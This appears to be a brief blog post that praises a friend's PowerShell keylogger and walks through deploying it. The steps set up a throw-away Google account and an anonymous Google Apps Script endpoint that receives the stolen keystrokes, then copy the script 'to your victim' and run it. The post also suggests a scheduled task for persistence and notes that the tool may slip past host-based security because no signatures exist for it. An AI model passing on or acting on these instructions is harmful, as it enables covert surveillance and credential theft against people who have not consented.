Powershell Keylogger

Aaron, made a cool PowerShell-based keylogger (well, it was python until I bribed him to re-write it for me…)

It is located on his GitHub page

It great because it handles the keylogging and the exfiltration of data!

In order to use it you:

  1. Create a fake Google Account (or use a throw-away)
  2. Create a Spreadsheet in that account’s Google Drive
  3. Make the Sheet public ..1. File > Share... > Give it a random name > Get sharable link
  4. Visit Google Scripts and paste in the code from server.gs
  5. Add the Sheet’s URL from step 3.1 to the SPREADSHEET_URL variable in server.gs .1. remove the ?usp=sharing at the end. URL should end in /edit
  6. Publish the server:
  7. Save and name the project
  8. Publish > Deploy as web app * Make sure Anyone, even anonymous can access the app
  9. Review permissions > (your fake accout here) > Advanced > Go to Untitled Project (unsafe) > enter ‘Continue’ > allow
  10. Copy the URL and paste it in the SERVER_URL of the logger you are using
  11. Copy the powershell code to your victim
  12. Run the powerShell script!
    • The script runs for 1 to 3 minutes before publishing the keystrokes to the Google Sheet
  13. Lastly, I went into the Google Sheet and published it to the web for easier viewing

Sometimes if I typed too fast, it doesnt record all of the typed keys, and it doesnt record backspaces or punctuation.

As-is, it only runs once and if you want it to continuously run, it needs some edits or perhaps a scheduled task to get it going again. When I used it, I edited it not use Google Scripts and instead, I had it save a file locally. Not very sneaky… I also set it to run for 10 minutes and send me its log via scheduled task and then restart the script. Because there aren’t signatures developed for it, it might not flag host-based security systems.

Neat little tool! Thanks Aaron!